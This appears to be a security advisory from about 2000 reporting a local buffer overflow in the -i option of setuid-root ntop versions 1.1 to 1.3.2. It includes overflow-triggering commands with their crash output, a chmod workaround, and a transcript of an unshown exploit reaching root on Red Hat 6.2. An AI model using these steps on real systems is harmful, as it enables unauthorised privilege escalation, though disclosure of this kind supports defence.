[ SOURCE: http://www.secureroot.com/security/advisories/9735745694.html ] Subject : ntop local buffer overflow vulnerability Author : Christophe BAILLEUX (cb@grolier.fr) Plateforms : *nix Test version : ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2 I. Problem All ntop versions are vulnerabled to local buffer overflow attack in there -i options. Ntop must be owned by root with a setuid bit for the attacker to gain root privileges. II. Demo a) ntop 1.1 tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'` ntop v.1.1 MT [i686-pc-linux-gnu] listening on AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Host Act -Rcvd- Sent TCP UDP ICMP Segmentation fault tshaw:/home/cb/SRCAUDIT/ntop-1.1$ b) ntop 1.2a7 tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'` Segmentation fault tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$ c) ntop 1.3.1 tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'` Segmentation fault tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$ d) ntop 1.3.2 tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'` 24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00 07:04:32 PM build) 24/Oct/2000:12:32:16 Listening on [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] 24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri 24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/ 24/Oct/2000:12:32:16 Initialising... Segmentation fault tshaw:/home/cb/ntop-1.3.2$ III. Workaround chmod ug-s path/to/ntop ntop team has been informed (http://www.ntop.org). IV. Exploit (See Attachment) Tested on redhat 6.2 (Zoot) where ntop is installed by default with the bit setuid root [cb@nux cb]$ cat /etc/redhat-release Red Hat Linux release 6.2 (Zoot) [cb@nux cb]$ rpm -qf /sbin/ntop ntop-1.1-1 [cb@nux cb]$ id uid=535(cb) gid=535(cb) groups=535(cb) [cb@nux cb]$ ./expl ntop v.1.1 MT [i586-pc-linux-gnu] listening on .............................. Host Act -Rcvd- Sent TCP UDP ICMP bash# bash# id uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb) bash# exit [cb@nux cb]$ Greetings to kalou, Bdev, cleb, dv, PullthePlug Community and all i forget. Thanks Teuk for leating me use his server, for do and test ntop redhat 6.2 exploit :) Regards, -- BAILLEUX Christophe - Network & System Security Engineer Grolier Interactive Europe-OG/CS Voice:+33-(0)1-5545-4789 - mailto:cb@grolier.fr